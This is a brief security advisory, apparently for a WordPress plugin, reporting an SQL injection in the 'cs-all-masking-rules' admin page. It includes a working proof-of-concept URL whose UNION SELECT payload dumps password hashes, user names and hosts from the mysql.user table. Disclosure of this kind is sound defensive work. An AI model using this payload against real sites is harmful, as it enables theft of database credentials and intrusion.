The plugin does not properly sanitise, validate and escape various parameters before using them in an SQL statement, leading to an SQL Injection
https://example.com/wp-admin/admin.php?page=cs-all-masking-rules&s=%27+union+SELECT+max_questions%2Cauthentication_string%2CUser%2CHost%2C1.0%2CUser+from+mysql.user+--+-